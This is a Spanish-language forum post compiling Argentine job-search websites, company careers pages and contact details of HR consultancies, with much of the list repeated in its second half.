kovnat
Usuario (Argentina)

Hola Taringueer@s hoy les traigo la recompliacion de mis post con unas listas de trabajo ¿Buscás trabajo? Consejos útiles para la búsqueda de trabajo. Se brinda información orientadora general para esta situación. http://www.trabajo.gob.ar/buscastrabajo/ Call Center (Consultas telefónicas) Consultas y denuncias laborales de todo el país, derivación directa a las áreas responsables. http://www.trabajo.gob.ar/consultas/ http://www.centrodeempleos.com/ Es una pagina donde la gente puede ver y registrar Currículos, Servicios u Ofertas de Empleo Trabajo x venir ofrece la posibilidad de ingresar CV y al mismo tiempo contemplar ofertas de trabajo; tambien contiene informacion util: consejos de busqueda, presentacion y guias para organizarse; ademas, articulos de actualidad y links http://www.infowork.origin.com.ar/ Un nexo entre postulante y empleador. No le cobra a ninguno de los dos. http://www.laborum.com y http://www.linklaboral.com/ permiten ingresar en su base de datos, y llegar así a cientos de consultoras y empresas, en forma gratuita. Este portal laboral tiene un millón de postulantes. Ofrece puestos de trabajo en la Argentina y en el exterior. http://www.infojobs.net/ Una bolsa de trabajo española que incluye ofertas de otros países. http://www.weblaboral.com/ Tiene ofertas de empleo actualizadas, para todo tipo de profesión y oficio. http://www.trabajos.com/ llene el formulario y tendrá su Curriculum en una página web gratuita por tiempo indefinido accediendo al menú de usuario. Lantel trabajos On Line tiene ofertas de trabajo de todos los paises de habla hispana, se puede insertar una oferta y buscar candidatos o consultar ofertas de trabajo y enviar curriculum, por profesión o país. http://www.empleos.net/ La Oficina de Empleos de Internet para América Latina. http://www.latpro.com/ Envía anuncios de trabajo automáticamente en su área de interés para que usted los revise y responda según les convenga, ofrece listados por industria o por función. Para poder responder a los anuncios de trabajo que recibirá gratis por medio de estas listas se debe ser miembro registrado en LatPro http://www.counsnet.com/banc.htm Un proyecto de alcance nacional, el primer Banco Nacional Unificado de Datos de Trabajo de la República Argentina. http://www.prowebdata.com.ar/ Brinda el servicio de acceso y consulta a un Banco de datos laboral. es un banco de datos laborales, al que acceden más de 80 consultoras y empresas de selección de personal. Ingresa curriculum de los postulantes. www.cmjobscareers.com Semanalmente publica las oportunidades laborales en proceso. Es un servicio diseñado para ejecutivos atentos a nuevas y mejores alternativas de carrera. Su objetivo principal es la publicación de todas las ofertas de trabajo. Lo publicado constituye un resumen de la posición, sin mencionar la empresa pero con datos que orientan a la persona para ver si la oferta es o no de su interés. La gente entra, ve la búsqueda y se autopostula. www.perfilesonline.com Los interesados pueden ingresar gratuitamente su curriculum vitae en la base de datos. Brinda servicios de consultoría en búsqueda y selección de personal. www.bluearrow.com.ar Consultora especializada en la búsqueda y selección de personal para bancos y empresas de teconología, recibe los curriculum de los candidatos que pasan a integrar su base de datos; además se publican las búsquedas de sus clientes; los interesados pueden corregir sus datos y borrarlos desde la base. www.bumeran.com.ar Búsqueda de empleo y recepción de curriculum on line, inició su expansión en México. Puede consultar las búsquedas con su perfil. Aquí ponen sus avisos de empleo más de dos mil empresas argentinas. Emplea2.com.ar Para que Ud. encuentre mas rápido lo que tanto necesita Emplea2 es un servicio gratuito de información laboral. Dentro de este sitio encontrará información útil que lo podrá ayudar en su búsqueda de trabajo, actualizados día a día. Puede dejar su curriculum u ofrecer trabajo. Contiene una lista de consultoras, sus responsables, direcciones y teléfonos. www.eco.org Agrupación sin fines de lucro dedicada a la promoción del cuidado del medio ambiente, ofrece pasantías, oportunidades de empleo para estudiantes, graduados recientes y profesionales del medio ambiente, servicios de consultoría, links, postcard, etc. www.recruitersnetwork.com Asociación que reúne a profesionales de Recursos Humanos, existen direcciones de consultoras www.viptown.com La página argentina del empleo y la capacitación provee información completa sobre los pasos a dar para conseguir empleo. Datos y tipos sobre curriculum, cartas, entrevistas, direcciones. www.cdeb.com.ar/mujeres Agrupa a mujeres empresarias, sus empresas, servicios y productos, como también a mujeres profesionales. Hay información sobre oportunidades de negocios, préstamos, asistencia técnica, proyectos para invertir, y búsquedas y ofrecimientos de trabajo. www.topjobs.net Ofrece oportunidades laborales en la red www.treelogic.com/teletrabajo Pedidos y ofertas de trabajo y la posibilidad de insertar el propio curriculum. www.empleos.net. Oficina on line de empleos para América Latina y España. Empleate.com/?f_pais=9 Clasificados, mercado de talento, mercado laboral, buscador de emplo, novedades, preguntas frecuentes, boletin electronico, buscador de talento, etc. · Emplear. Distribuye su CV a Consultoras y Empresas. ESTE SERVICIO NO ES GRATUITO. Emplear "El camino hacia el empleo" para hallar empleo a traves de un programa de insercion laboral y "Soluciones en recursos humanos", servicios de recursos humanos para empresas. Contiene varias ofertas pagas con distintas coberturas CV LATINO. Página de empleos, CV Latino, para colocar el CV, links, latinos en USA (abarca tambien Latinonamerica) busqueda de empleos en la base de datos, etc. Portal Profesional (http://www.portalprofesional.com/ ) o Computrabajo (http://www.ar.computrabajo.com) se especializan en empleos del área informática. Tambien lo hace UNIVERSO BIT. Oportunidades Laborales para la comunidad informática de habla hispana, Servicios para el mercado laboral informatico, ingreso de CV, capacitacion, publicacion de ofertas gratuitas para empresas, busqueda y seleccion, boletin, avisos clasificados referidos a busquedas de empleos en informatica. http://www.computrabajo.com/ En 2002 ya publicaron 400 avisos. Consultoras www.adecco.com.ar alejandrasalinas.com.ar www.americarh.com.ar computrabajo.com bumeran.com www.bluearrow.com.ar www.buscojobs.com bzconsultores.com www.canaldeempleo.com.ar www.cesa.com.ar www.chiesacassara.com.ar www.chubutempresarial.com www.conaxion.com.ar consultorasebgon www.csglobal.com.ar www.ecelaboral.com.ar www.elportaldelempleo.com.ar empleos.amia.org.ar www.empleos.net www.empleosparamayores.com.ar empleoscreativos.com www.empleosregionales.com.ar empleos clarin www.equipoygestion.com.ar www.guiajobs.com www.gruporta.com www.hb-consultores.com.ar www.laboralrosario.com www.laborum.com www.magsys.com.ar www.manpower.com.ar www.maxline.com.ar www.menuempleos.com monicajuncos.com.ar www.ndconsultores.com.ar nexoconsultora.com.ar www.opcionempleo.com.ar www.oportunidadeslaborales.com www.orionrrhh.com.ar www.patagoniajobs.com www.proyectosurrhh.com.ar www.qualification.com.ar recursoshumanos.cemnegocios.com.ar eddetrabajo.com.ar rtconsultora.com.ar sapphire-tech.com.ar select-executives.com.ar sesa-select.com.ar telerecursos.com.ar www.trabajos.com trabajos.net tuproximotrabajo.com.ar www.tutorialaboral.com.ar universolaboral.com ww.vonderheide www.zonajobs.com.ar AUTOSERVICIO MAYORISTA DIARCO http://www.diarco.com.ar/web/bolsa.php AUTOSERVICIO MAXICONSUMO http://www.maxiconsumo.com/recursos.html AUTOSERVICIO MAYORISTA EL CICLON http://www.elciclon.com.ar/rrhh.html AUTOSERVICIO SUPERMERCADO MAYORISTA VITAL http://www.vital.com.ar/rrhh.html AUTOSERVICIO SUPERMERCADO DIA http://dia.bumeran.com.ar/aplicantes/home.ngmf ACINDAR http://www.acindar.bumeran.com.ar/aplicantes/a_datospersonales.ngmf ALBA PINTURAS http://www.alba.bumeran.com.ar/aplicantes/home.ngmf ANDREANI http://www.andreani.com.ar/institu/nueva/index.htm ARVATO (Telemarketing) empleos@arvato.com.ar AROMA (COMIDAS) http://www.aroma.bumeran.com.ar/aplicantes/home.ngmf BANCO GALICIA http://www.e-galicia.com/migracionv7/frontend/IngresoDeCurriculumXML/t_rrhhCurri.asp BANCO FRANCÉS http://www.bancofrances.com.ar/tlal/jsp/ar/esp/institu/recurhu/envianot/index.jsp#0 BANCO HIPOTECARIO http://www.hipotecario.com.ar/default.asp?id=75 BANCO MACRO http://www.macro.com.ar/scp/rrhh_unite.asp?lang= BANCO ITAÚ http://www.itau.com.ar/rrhh/ingresocv.htm BANCOMER http://213.229.161.72/candidato/general/login/login.asp BASSO (VALVULAS DE MOTORES, SANTA FÉ) http://www.basso.com.ar/personal/ BLOCKBUSTER http://www.blockbuster.com.ar/rrhh/default.aspx?intMenu=20 BONPLER (FAST FOOD) info@bonpler.com.ar CARREFOUR http://www.telecom.bumeran.com.ar/aplicantes/home.ngmf CORREO ARGENTINO http://www.correoargentino.com.ar/rrhh/recursos_humanos.php COMPUTRABAJO http://www.computrabajo.com.ar/cv-crear.htm COTO http://200.51.92.131/cvitae/ COCA COLA http://www.cocacola.com.ar/institucional/csol/jovenes_profesionales.asp CUBECORP (Telemarketing) http://www.cubecorp.bumeran.com.ar/aplicantes/a_datospersonales.ngmf DHL CORREO http://dpwn.jobpartners.com/jpapps/dhl_ia/jobs/joblist.jsp?searchtype=sta&searchbywhat=san&LocLevSelT_searchall0=268&LocLevSelT_searchall1=519®ions=519&lang=eses&myc=true DISCO http://www.disco.bumeran.com.ar/aplicantes/home.ngmf EDENOR http://edenor.zonajobs.com.ar/ EASY http://www.easy.com.ar/easy/site/Easy/Institucional/Unite%20a%20nuestro%20staff.html?uri=urn:kbee:0a21f590-765f-11db-af9e-0015f2bfd686&page-uri=urn:kbee:1ffec8c0-7664-11db-af9e-0015f2bfd686 FARGO http://www.fargo.com.ar/ GRUPO MARQUEZ http://www.grupomarquez.com.ar/recursoshumanos.php HIPODROMO DE PALERMO http://www.payroll.com.ar/hapsa/ JUMBO http://www.jumbo.bumeran.com.ar/aplicantes/home.ngmf LA SERENISIMA http://www.laserenisima.com.ar/Pages/Postulantes.aspx MOSTAZA HAMBURGUESAS curriculum@mostazaweb.com.ar MC DONALD´S http://empleos.mcdonalds.com.ar/aplicantes/home.ngmf MUSIMUNDO http://musimundo.zonajobs.com.ar/default.asp?gclid=CP-X5dj1n5QCFQWVFQodWRI_tQ MOVISTAR http://www.movistar.bumeran.com.ar/aplicantes/a_datospersonales.ngmf NA-SA NUCLEOLICA ARGENTINA http://www.na-sa.com.ar/joffers/view OCASA CORREO http://www.ocasa.com/nimagen/index.asp?lang=1 PETROBRAS http://www.petrobras.bumeran.com.ar/aplicantes/a_datospersonales.ngmf REPSOL YPF http://www.ypf.com/ar_es/todo_sobre_repsol_ypf/trabaja_con_nosotros/eRecruiting/e-Recruiting.aspx RADIO SAPIENZA http://www.radiosapienza.com.ar/personal.html SIEMENS http://w4.siemens.com/en/career/latames/index.html SHELL http://www.shellcv.bumeran.com.ar/aplicantes/home.ngmf TELEFONICA http://www.telefonica.com.ar/rrhh/ TELECOM http://www.telecom.bumeran.com.ar/aplicantes/home.ngmf TELEPERFORMANCE (Telemarketing) http://www.teleperformance.bumeran.com.ar/aplicantes/home.ngmf TEMIS-LOSTALO (LABORATORIO) info@temislostalo.com.ar YAMAHA http://www.yamaha-motor.com.ar/rrhh.php DIRECCIONES DE CONSULTORAS DE RECURSOS HUMANOS MAN POWER (casa central) Av. Tte. Gtal. Peron 1111 piso 10 PRODUTEC Lavalle 1125 3° 8° ACCENTURE Maipú 1210 8vo. Piso ACTION GROUP EDUCATION & CONSULTING Blvd. Chacabuco 187 5to. Piso of. H ADECCO ARGENTINA S.A. Suipacha 745 4to.piso AGRO SRL Migueletes 1268 2do "C" C1426 BUR-Capital Federal (0-11) 4771-5961 Sector Agropecuario busquedas@agrostaff.com AINBINDER ABOLSKY CONSULTORES Perú 367 10mo. Piso C1067 AGG-Capital Federal (0-11) 4343-4496 y 4831-9680 Fax: 4343-8834 Consultoría Integral mabolsky@ciudad.com.ar ALEJANDRA SALINAS Y ASOCIADOS Alsina 943 6to. Piso of. 607 C1088 AAA-Capital Federal Consultora en R.R.H.H. consultora@alejandrasalinas.com.ar A & S NISEL CONSULTORES Córdoba 1827 4to. Piso of. "D" C1120 AAA-Capital Federal (0-11) 4816-9147/8/5887 Recursos Humanos a_mconsultores@ciudad.com.ar http://www.aymconsultores.com.ar BDO-BECHER LINCHTENSTEIN & ASOC. Maipú 942 1er. Piso C1006 ACN-Capital Federal (0-11) 4106-7000 Consultoría Empresaria Internacional info@bdo-argentina.com http://www.bdo-argentina.com BEATRIZ CIOCCA & ERNESTO AGUIRRE Av. Pte. Quintana 575 1er. Piso of. "A" C1129 ABB-Capital Federal (0-11) 4804-0424 Selección y Evaluación de Personal selección@ciocca-aguirre.com.ar BEC CONSULTING GROUP Lavalle 534 5to. Piso C1047 AAL-Capital Federal (0-11) 4327-3222 Fax: (0-11) 4394-6574 Recursos Humanos paltilio@bec.com.ar BELICE & ASOCIADOS Carlos Pellegrini 137 3er. Piso C1009 ABC-Capital Federal (0-11) 4322-8211 Empleos y Desarrollo info@belice.com.ar http://www.portalrh.com.ar (C.V. sólo por web) BERNABEU CONSULTORA Suipacha 211 6to. Piso of. "E" C1008 AAE-Capital Federal (0-11) 4327-2116 Selección y Búsqueda de ejecutivos bernabeu@movi.com.ar BENDERSKY & ASOCIADOS Santos Dumont 2459 1er. Piso "A" C1426 DCC-Capital Federal Mandos medios y Gerenciales cvbdi@bdi.com.ar y bendersky@bdi.com.ar http://www.bdi.com.ar BLUE ARROW SEARCH & SELECCIÓN Especialistas en e-recruitment (selección por Internet) Especialistas en Bancos, perfiles de tecnología y secretarias pero abarcan todas las áreas. http://www.bluearrow.com.ar BRAVO & BRAVO LOSADA - IGAF WORLDWIDE Av. Córdoba 1255 C1055 AAC-Capital Federal (0-11) 4816-1221 Fax: (0-11) 4815-7878 Auditoría, Impuestos, Consultoría, R.R.H.H. info@bravocpas.com http://www.bravocpas.com BRG EMPRENDIMIENTOS S.A. México 1173 1er. Piso of. "1" C1097 AAW-Capital Federal (0-11) 4382-9458 Selección de Personal. No recibe cv en oficina rolar@ar.inter.net BRS CONSULTORES Carlos Calvo 2020 1 "6" C1230 AAF-Capital Federal 0-11) 4308-0436 Consultores en Evaluaciones y Selección de RRHH brs_rrhh@ciudad.com.ar BOYDEN ARGENTINA Cerrito 1266 3er. Piso of. "15" C1010 AAZ-Capital Federal (0-11) 4815-2705 Retain Based Executive Search Firm boydenba@boyden.com.ar http://www.boyden.com.ar Para Profesionales www.oportunidadeslaborales.com www.laborum.com/Postulantes/Post_Index.htm www.ar.computrabajo.com/em-registrar.htm www.bumeran.com.ar www.trabajos.net/jobseekers/ www.tm-consultores.com.ar/a_formcv.php www.trabajofreelance.com www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.menuempleos.com www.canaldeempleo.com.ar www.bluearrow.com.ar Sistemas www.universobit.com Cualquier rubro laboral www.alejandrasalinas.com.ar www.trabajos.com/ www.brainpeople.com.ar www.empleos.amia.org.ar www.tm-consultores.com.ar/a_formcv.php www.empleosregionales.com.ar www.trabajos.net/jobseekers/ www.guiabuscotrabajo.com.ar www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.tutorialaboral.com.ar www.menuempleos.com www.canaldeempleo.com.ar www.maxline.com.ar www.bluearrow.com.ar www.oportunidadeslaborales.com Ingreso de curriculum a consultoras www.alejandrasalinas.com.ar www.monicajuncos.com.ar www.laborum.com/Postulantes/Post_Index.htm www.ar.computrabajo.com/em-registrar.htm ar1.bumeran.com/aplicantes/a_datospersonales.ngmf www.empleos.net www.tm-consultores.com.ar/a_formcv.php www.tutorialaboral.com.ar www.trabajos.net/jobseekers/ www.elportaldelempleo.com.ar www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.universolaboral.com www.nexoconsultora.com.ar www.bluearrow.com.ar www.adecco.com.ar/ Carga tu CV: www.adeccoempleo.com/Default.aspx Consulta Sucursales www.adecco.com.ar/NuestrasOficinas.asp www.manpower.com.ar/default.asp www.empleo.amia.org.ar/defaultDB.asp www.sesa-select.com.ar/ careers.deloitte.com/gateway.aspx?languageID=SP&GlobalCountryCode=SP Solvens www.solvens-treat.com.ar/SOLVENS/index.html www.noraferreryasoc.com.ar/home.htm www.serhconsultores.com.ar/frmIngresoCV1.asp SELECTAS RECURSOS HUMANOS www.selectas.net/ Listado y mails de Consultoras y agencias laborales OTT EMPLOYMENT BUREAU employment@ott.edu.ar SELECTAS RECURSOS HUMANOS selectas@interserver.com.ar A&C ANALISTAS Y CONSUL. EN ESTRATEGI ayc-cons@act.net.ar ACUERDO DESARROLLO ORGANIZACIONAL acuerdo@infovia.com.ar ADECCO ARGENTINA S.A. sarmiento@adecco.com.ar ADVISORS BUREAU S.R.L. advisors@jea.datamar.com.ar AGORA SELECCIÓN agora@cvti.com.ar AGROSTAFF agrosrl@infovia.com.ar AGUILAR & ASOCIADOS laguilar@datamarkets.com.ar AINBINDER ABOLSKY CONSULTORES ainabocp@sminter.com.ar AIZENSZLOS & ASOCIADOS ismael@aizen.com.ar ALBERTO MAQUEIRA Y ASOCIADOS agmyasoc@mail.pccp.com.ar ALEJANDRA SALINAS Y ASOCIADOS info@alejandrasalinas.com.ar ALTEA SERVICIOS EMPRESARIOS info@altea-se.com.ar ANA FEUGAS RECURSOS HUMANOS feugas@ciudad.com.ar ANA MAILHE SELECCIÓN DE PERSONAL amailhe@infovia.com.ar ARCHENTI & ASOCIADOS archenti@archenti.com.ar ARTEAGA CONSULTORA RECURSOS HUMA arteaga@sinectis.com.ar ASESORA TEMPORAL SRL Y JÓVENES PRO asesoratemporal@ciudad.com.ar ASSET MARKETING & COMUNICACIÓN rrhh@assetmyc.com B&B CONSULTORES RRHH Y ORGANIZAC. b&bconsultores@interar.com.ar BDO BECHER LICHTENSTEIN & ASOC. info@bdo-argentina.com BEATRIZ CIOCCA & ERNESTO AGUIRRE seleccion@ciocca-aguirre.com.ar BEC CONSULTING GROUP rrhh@bec.com.ar BELISE Y ASOCIADOS belise@ssdnet.com.ar BENDERKY & ASOCIADOS - SELEC. PERSO formulario@bdi.com.ar BERNABEU CONSULTORA bernabeu@movi.com.ar BLUE ARROW SEARCH & SELECCIÓN job@bluearrow.com.ar BOYDEN summers@ictis.com.ar BRAIDOT Y ASOCIADOS CONSULTING BUSIN nba@braidot.com BRS CONS. DE ORGANIZ. Y PERSONAS brs_rrhh@ciudad.com.ar BUREAU CONSULTORES srm@bureaunet.com.ar BUROCONSULT buroconsult@fibertel.com.ar BUSINESS BUREAU businessbureau@businessbureau.com BUSINESS PROCESSES INTERNATIONAL bpicon@arnet.com.ar Business Consulting & Associates. recruitmentbca@ciudad.com.ar C & R CONSULTORES ORGANIZACIONALES crconsul@ba.net C, F & L CONSULTORES ASOCIADOS aniedu@cvtci.com.ar CAAMAÑO & ASOCIADOS caamano@inea.com.ar CÁMARA INTERN. DE COM. DEL MERCOSUR camercosur@uol.com.ar CÁMPORA & CONDOMÍ ALCORTA tacoral@overnet.com.ar CAREER MANAGERS SA clientes@careermanagers.com.ar CASTELLO & ASOCIADOS castelloyasociados@castello-net.com CAVALLERI FORGIA & ASOCIADOS leoforgia@overnet.com.ar CCN CONSULTORES seleccion@ccn.com.ar CEDEPE cedepe@ciudad.com.ar CERVANTES Y ASOCIADOS cervant@mbox.servicenet.com.ar CHAMPS CONSULTORA champs@arnet.com.ar CLAUDIO A. ROITMAN & ASOCIADOS roitman@bigfoot.com CLIENTING GROUP SA dspina@clienting.com.ar CM SOCIOLOGIA DE EMPRESAS cmsearch@cmsociologia.com CODNER & CO cv@codner.com.ar COLES, BORN Y ASOCIADOS consultores@colesborn.com.ar CONSULTORA INSTITUCIONAL consultoras@usa.net CONSULTORA PERSONAL OK SRL okpayroll@ciudad.com.ar COUNSELORS SRL info@counselors.com.ar CP. CONSULTORES EN RR.HH. cpconsult@infovia.com.ar CRISIL CONSULTORES Crisil@datamarkets.com.ar D&A CONSULTORES daconsul@act.net.ar D.V.D DE OLIVIERA, VIDELA & ASOCIADOS C dvd@sadnet.com.ar DE MARTINE Y ASOCIADOS SRL de_martine@hotmail.com DEL PLATA CONSULTORES EN RR HHSA delplata@delplatarrhh.com.ar DELOITTE & TOUCHE - DIV. RR.HH. baoffice@deloitte.com.ar DML CONSULTORES busquedas@dmlconsultores.com.ar DONOSO Y ASOCIADOS donosoas@intersearch.org DOUBLETREE S. A. CONSULTORES - CONSU doubletree@ciudad.com.ar DUET COACHING EN RR.HH. duetcoaching@yahoo.com.ar EASTMAN SELECCIÓN eastman@sudnet.com.ar EBM CONSULTORA ebmmail@datamarkets.com.ar EDUCARE CONSULTORA educare@arnet.com.ar EHQ CONSULTORES EN RR.HH. ehqrrhh@sminter.com.ar ELEONORA TRILNIK & ASOCIADOS consultas@trilnikmarketing.com.ar ENCUADRE & ESTRATEGIAS encuadre@movi.com.ar EPOCA CONSULTORES epoca@teletel.com.ar ESTELA SARRAUTE info@sarraute.com ESTRATEGIAS CONSULTORES EN SELECCI estrategias@arnet.com.ar ESTUDIO GRIEBEN cv@grieben.com.ar ESTUDIO LAGO CONTADORES Y CONSULTO estlago@impsat1.com.ar ESTUDIO LICENCIADO PABLO G. BERMAN pgberman@sinectis.com.ar EXPERTISE S.A. expertise@expertise-sa.com.ar FALOUR BURÓ & ASOCIADOS fb&asoc@overnet.com.ar BELTRANI & ASOCIADOS cv@beltrani.com.ar FERNANDO TEJERO Y ASOCIADOS htejero@mail.peep.com.ar FERNAUD & ASOCIADOS info@sciselection.com.ar FINES SERVICIOS EMPRESARIOS fines-cv@redynet.com.ar FIRMWARE SA info@firmware.com.ar FRANCISCO GARCÍA MARTÍNEZ Y ASOC. serv_personal@ciudad.com.ar FUCHSCONSULT mfuchs@infovia.com.ar G&G CONSULTORA EN RECURSOS HUMANO gygrh@arnet.com.ar GABRIEL SCHWARTZ Y ASOCIADOS gabrielschwartz@yahoo.com.ar GÉCI Y CORNEJO CONSULTORES DE RR.HH gecicornejo@movi.com.ar GHIDINI, RODIL & ASOCIADOS seleccion@ghidinirodil.com.ar GLOBAL SERVICE SA globals@teletel.com.ar GM ESTRATEGIAS ORGANIZACIONALES gmaggiolo@arnet.com.ar GRANT THORNTON AUDITORES Y CONSULT hr@gtarg.com GRECO & LOUZAO CONSULTORES SRL louzao@overnet.com.ar GROSSI CONSULTORES CRITERIA grossi@movi.com.ar GRUPO BRAIN info@grupopbrain.com.ar GUILLERMO FIGUEROA & ASOCIADOS guillermofigueroa@ciudad.com.ar H & F CONSULTORES ASOCIADOS hfconsult@ciudad.com.ar HABERCONF ASOCIADOS SRL haberconf@overnet.com.ar HART CASARES HEADHUNTERS curriculas@hartcasares.com HARTE Y ASOCIADOS harteb@infovia.com.ar HARTENECK-QUIAN & ASOC. DIV. RRHH hartquirh@infovia.com.ar HEAD HUNTER info@head-hunter.com.ar HIDALGO & ASOCIADOS info@bhidalgo.com.ar HORWARTH CONSULTING rrhh@horcan.com.ar HUGO GRANA CONSULTORES info@hugograna.com HUGO T. LEVY & ASOCIADOS consultores@hugotlevy.com.ar HUGO TORRENTE torrente@infovia.com.ar HUMAN CAPITAL CONSULTING SA human@fibertel.com.ar HUMAN INTEGRITY human@satlink.com HUMAN POTENCIAL & BUSINESS SUPPORT spriegel@inea.com.ar IBERSIS - GRUPO UNIÓN FENOSA flaks@ibersis.com INDUSTRIAL RELATIONS & MANAGEMENT C irmc@redynet.com.ar INFOGEN info@infogen.com.ar IRLICHT CONSULORES irlicht@infovia.com.ar J.M CONDOMI ALCORTA CONSULTORES AS tacoral@overnet.com.ar JACHIA MOLINARI & ASOCIADOS jmasoc@ciudad.com.ar JAIME MARISTANY Y ASOCIADOS jmo@jaimemaristany.com.ar JEBSEN & CO. CONSULTING cv@jebsen.com.ar KEEN Y ASOCIADOS CONSULT. EN RR HH lkeen@impsat1.com.ar KPMG - DIVISION EXECUTIVE SEARCH executivesearch@kpmg.com.ar KS & ASOCIADOS ASESORÍA INTEGRAL ksconsultora@fibertel.com.ar LARRIERA Y ASOCIADOS larriera@feedback.net.ar LE SUIVANT lesuivant@overnet.com.ar LEVIMINOND CONSULTORA & ASOCIADOS cv@leviminond.com.ar LIC. ALEX PITASI apitasi@elsitio.com LIC. ELENA WAINRYB Y ASOCIADOS wainryb@infovia.com.ar LIC. LAURA ZANELLA DE BRACCO proyecto.2003@sion.com LIC. NORA GLUZMAN anoragluzman@datamarkets.com.ar LIC. VILABOA & HOLGADO CONSULT. SELEC mholgado@arnet.com.ar Libedinsky & Rottari Consultores en RRHH info@lrconsultores.com.ar LIM ARGENTINA silvialeon@ciudad.com.ar

AUTOSERVICIO MAYORISTA DIARCO 142fc496eac1104b24ae30fdcb1cffa1http://www.diarco.com.ar/web/bolsa.php AUTOSERVICIO MAXICONSUMO http://www.maxiconsumo.com/recursos.html AUTOSERVICIO MAYORISTA EL CICLON http://www.elciclon.com.ar/rrhh.html AUTOSERVICIO SUPERMERCADO MAYORISTA VITAL http://www.vital.com.ar/rrhh.html AUTOSERVICIO SUPERMERCADO DIA http://dia.bumeran.com.ar/aplicantes/home.ngmf ACINDAR http://www.acindar.bumeran.com.ar/aplicantes/a_datospersonales.ngmf ALBA PINTURAS http://www.alba.bumeran.com.ar/aplicantes/home.ngmf ANDREANI http://www.andreani.com.ar/institu/nueva/index.htm ARVATO (Telemarketing) empleos@arvato.com.ar AROMA (COMIDAS) http://www.aroma.bumeran.com.ar/aplicantes/home.ngmf BANCO GALICIA http://www.e-galicia.com/migracionv7/frontend/IngresoDeCurriculumXML/t_rrhhCurri.asp BANCO FRANCÉS http://www.bancofrances.com.ar/tlal/jsp/ar/esp/institu/recurhu/envianot/index.jsp#0 BANCO HIPOTECARIO http://www.hipotecario.com.ar/default.asp?id=75 BANCO MACRO http://www.macro.com.ar/scp/rrhh_unite.asp?lang= BANCO ITAÚ http://www.itau.com.ar/rrhh/ingresocv.htm BANCOMER http://213.229.161.72/candidato/general/login/login.asp BASSO (VALVULAS DE MOTORES, SANTA FÉ) http://www.basso.com.ar/personal/ BLOCKBUSTER http://www.blockbuster.com.ar/rrhh/default.aspx?intMenu=20 BONPLER (FAST FOOD) info@bonpler.com.ar CARREFOUR http://www.telecom.bumeran.com.ar/aplicantes/home.ngmf CORREO ARGENTINO http://www.correoargentino.com.ar/rrhh/recursos_humanos.php COMPUTRABAJO http://www.computrabajo.com.ar/cv-crear.htm COTO http://200.51.92.131/cvitae/ COCA COLA http://www.cocacola.com.ar/institucional/csol/jovenes_profesionales.asp CUBECORP (Telemarketing) http://www.cubecorp.bumeran.com.ar/aplicantes/a_datospersonales.ngmf DHL CORREO http://dpwn.jobpartners.com/jpapps/dhl_ia/jobs/joblist.jsp?searchtype=sta&searchbywhat=san&LocLevSelT_searchall0=268&LocLevSelT_searchall1=519®ions=519&lang=eses&myc=true DISCO http://www.disco.bumeran.com.ar/aplicantes/home.ngmf EDENOR http://edenor.zonajobs.com.ar/ EASY http://www.easy.com.ar/easy/site/Easy/Institucional/Unite%20a%20nuestro%20staff.html?uri=urn:kbee:0a21f590-765f-11db-af9e-0015f2bfd686&page-uri=urn:kbee:1ffec8c0-7664-11db-af9e-0015f2bfd686 FARGO http://www.fargo.com.ar/ GRUPO MARQUEZ http://www.grupomarquez.com.ar/recursoshumanos.php HIPODROMO DE PALERMO http://www.payroll.com.ar/hapsa/ JUMBO http://www.jumbo.bumeran.com.ar/aplicantes/home.ngmf LA SERENISIMA http://www.laserenisima.com.ar/Pages/Postulantes.aspx MOSTAZA HAMBURGUESAS curriculum@mostazaweb.com.ar MC DONALD´S http://empleos.mcdonalds.com.ar/aplicantes/home.ngmf MUSIMUNDO http://musimundo.zonajobs.com.ar/default.asp?gclid=CP-X5dj1n5QCFQWVFQodWRI_tQ MOVISTAR http://www.movistar.bumeran.com.ar/aplicantes/a_datospersonales.ngmf NA-SA NUCLEOLICA ARGENTINA http://www.na-sa.com.ar/joffers/view OCASA CORREO http://www.ocasa.com/nimagen/index.asp?lang=1 PETROBRAS http://www.petrobras.bumeran.com.ar/aplicantes/a_datospersonales.ngmf REPSOL YPF http://www.ypf.com/ar_es/todo_sobre_repsol_ypf/trabaja_con_nosotros/eRecruiting/e-Recruiting.aspx RADIO SAPIENZA http://www.radiosapienza.com.ar/personal.html SIEMENS http://w4.siemens.com/en/career/latames/index.html SHELL http://www.shellcv.bumeran.com.ar/aplicantes/home.ngmf TELEFONICA http://www.telefonica.com.ar/rrhh/ TELECOM http://www.telecom.bumeran.com.ar/aplicantes/home.ngmf TELEPERFORMANCE (Telemarketing) http://www.teleperformance.bumeran.com.ar/aplicantes/home.ngmf TEMIS-LOSTALO (LABORATORIO) info@temislostalo.com.ar YAMAHA http://www.yamaha-motor.com.ar/rrhh.php Para Profesionales www.oportunidadeslaborales.com www.laborum.com/Postulantes/Post_Index.htm www.ar.computrabajo.com/em-registrar.htm www.bumeran.com.ar www.trabajos.net/jobseekers/ www.tm-consultores.com.ar/a_formcv.php www.trabajofreelance.com www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.menuempleos.com www.canaldeempleo.com.ar www.bluearrow.com.ar Sistemas www.universobit.com Cualquier rubro laboral www.alejandrasalinas.com.ar www.trabajos.com/ www.brainpeople.com.ar www.empleos.amia.org.ar www.tm-consultores.com.ar/a_formcv.php www.empleosregionales.com.ar www.trabajos.net/jobseekers/ www.guiabuscotrabajo.com.ar www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.tutorialaboral.com.ar www.menuempleos.com www.canaldeempleo.com.ar www.maxline.com.ar www.bluearrow.com.ar www.oportunidadeslaborales.com Ingreso de curriculum a consultoras www.alejandrasalinas.com.ar www.monicajuncos.com.ar www.laborum.com/Postulantes/Post_Index.htm www.ar.computrabajo.com/em-registrar.htm ar1.bumeran.com/aplicantes/a_datospersonales.ngmf www.empleos.net www.tm-consultores.com.ar/a_formcv.php www.tutorialaboral.com.ar www.trabajos.net/jobseekers/ www.elportaldelempleo.com.ar www.csglobal.com.ar www.ndconsultores.com.ar www.bsmconsultores.com.ar www.universolaboral.com www.nexoconsultora.com.ar www.bluearrow.com.ar www.adecco.com.ar/ Carga tu CV: www.adeccoempleo.com/Default.aspx Consulta Sucursales www.adecco.com.ar/NuestrasOficinas.asp www.manpower.com.ar/default.asp www.empleo.amia.org.ar/defaultDB.asp www.sesa-select.com.ar/ careers.deloitte.com/gateway.aspx?languageID=SP&GlobalCountryCode=SP Solvens 